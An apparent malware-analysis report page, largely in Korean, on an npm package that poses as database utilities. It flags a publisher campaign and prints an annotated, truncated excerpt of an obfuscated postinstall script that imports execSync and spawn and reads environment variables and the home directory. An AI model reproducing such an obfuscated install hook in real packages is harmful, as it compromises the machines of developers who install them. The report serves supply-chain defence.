// npm 패키지
@cloudplatform-single-spa/cp-api-gw
Internal database utilities with connection pooling, query builder and migration support
주간
107
월간
107
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,446 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x45fae4=a0_0xf092;(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-…
// publisher 캠페인
by mr.4nd3r50n
이 계정에서 catch된 패키지 9건
고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태입니다. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
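llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s). 단, 이 LLM 판정은 같은 항목의 heuristic 100/100 및 osv-flagged:MAL-2026-4901과 상충합니다. 발췌된 postinstall 스크립트는 문자열이 난독화되어 있고 execSync·spawn을 가져오므로, '전송지 없음'은 전송지가 정적으로 추출되지 않았다는 뜻일 뿐 안전하다는 근거로 읽어서는 안 됩니다.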
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n · heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-4901 · reads-env-vars · reads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts ---
### postinstall
node scripts/postinstall.js
### prepublishOnly
echo 'Building...'
--- package/scripts/postinstall.js (excerpt) ---
// NOTE(review): this file is wired to the `postinstall` hook listed above, so npm
// runs it during `npm install` of the package, before any consumer code calls the
// library API. The excerpt is truncated by the report and ends mid-expression.
'use strict';
// Alias for a0_0xf092, which is defined outside this excerpt — presumably the
// lookup function that maps a numeric index to a decoded string.
const a0_0x45fae4=a0_0xf092;
// Self-invoking loop: rotates the array returned by a0_0x503c() (push(shift()))
// until an arithmetic checksum built from parseInt() of looked-up entries equals
// the constant passed as the second argument; a throw during evaluation also
// rotates. a0_0x503c is not shown — presumably the obfuscator's string table.
// Effect for an analyst: string literals below cannot be read without resolving
// this table, which is why no destination string was extracted statically.
(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-0x282*0x2)*(parseInt(_0x2e05fd(0x1e3))/(0x71f+0xc1b+0x99c*-0x2))+parseInt(_0x2e05fd(0x17d))/(0x2237+-0x41*-0x61+-0x3ad5)*(parseInt(_0x2e05fd(0x1b9))/(0x1*-0x1093+0x29*0xd3+0x5bc*-0x3))+parseInt(_0x2e05fd(0x1c4))/(-0xecb+-0x1*0x20f1+-0x3*-0xfeb)+-parseInt(_0x2e05fd(0x1ba))/(0x23c5+0x1*-0x13c3+-0xffc)*(parseInt(_0x2e05fd(0x1d3))/(0x174f+0xd*0x7+-0x3*0x7e1))+parseInt(_0x2e05fd(0x1e0))/(0x49*-0x6b+-0x1005+0x2e90)*(parseInt(_0x2e05fd(0x1a3))/(-0x10c0*0x2+-0x228d+-0x23*-0x1f2))+-parseInt(_0x2e05fd(0x1bc))/(0xfdf+-0x1312+0x33d)*(-parseInt(_0x2e05fd(0x1c2))/(-0x75a+-0x1c2f+-0x45*-0x84))+-parseInt(_0x2e05fd(0x1b4))/(0x59c+-0x820+0x4*0xa4);if(_0x4152a2===_0x250139)break;else _0x2e9853['push'](_0x2e9853['shift']());}catch(_0x477a4e){_0x2e9853['push'](_0x2e9853['shift']());}}}(a0_0x503c,-0x196d60+-0x76f*0xf7+0x2d987c));
// Module loads and constants. Only 'os' and 'fs' are named in clear text; the
// other module names are resolved through the string lookup and are not visible.
const a0_0x615025=require('os'),
a0_0x335994=require('fs'),
a0_0x25eb23=require(a0_0x45fae4(0x17c)),
a0_0x4a3e90=require(a0_0x45fae4(0x1d2)),
a0_0x40a9ed=require(a0_0x45fae4(0x18f)),
// Destructures execSync and spawn from a module whose name is hidden —
// presumably child_process (TODO confirm by resolving index 0x1d7). Whether and
// how they are called is outside this excerpt.
{execSync:a0_0x3ed14c,spawn:a0_0xd99502}=require(a0_0x45fae4(0x1d7)),
// Four string constants taken from the lookup table; their values are not visible here.
a0_0x4b8825=a0_0x45fae4(0x1a8),
a0_0x125a18=a0_0x45fae4(0x187),
a0_0x59f10e=a0_0x45fae4(0x182)+a0_0x45fae4(0x17f),
a0_0x444cbd=a0_0x45fae4(0x1c9),
// Boolean: is the environment variable named by a0_0x444cbd set? The variable
// name is hidden; this line matches the report's reads-env-vars flag.
a0_0x1def5c=!!process.env[a0_0x444cbd],
// Compares a lookup result with itself. NOTE(review): looks like an obfuscator
// artefact rather than a real condition — confirm. The excerpt stops here; the
// trailing `|` may be the report's own separator rather than part of the script.
a0_0x13b9d3=a0_0x45fae4(0x1d8)===a0_0x45fae4(0x1d8)|
--- bundled output (OSV-MAL flagged — LLM scope expansion) ---
--- dist/index.d.ts (bundled) ---
// Type declarations only: they describe the advertised API (pool creation, query,
// transaction, migrate) and contain no executable code. They say nothing about
// what scripts/postinstall.js does at install time.
export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; }
export interface Pool { host: string; port: number; database: string; }
export function createPool(options?: PoolOptions): Pool;
export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>;
export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>;
export function migrate(pool: Pool, dir?: string): Promise<string[]>;
--- dist/index.js (bundled) ---
'use strict';
// dist/index.js
// Re-exports ../src/index.js, which is not included in this report excerpt.
module.exports = require('../src/index.js');
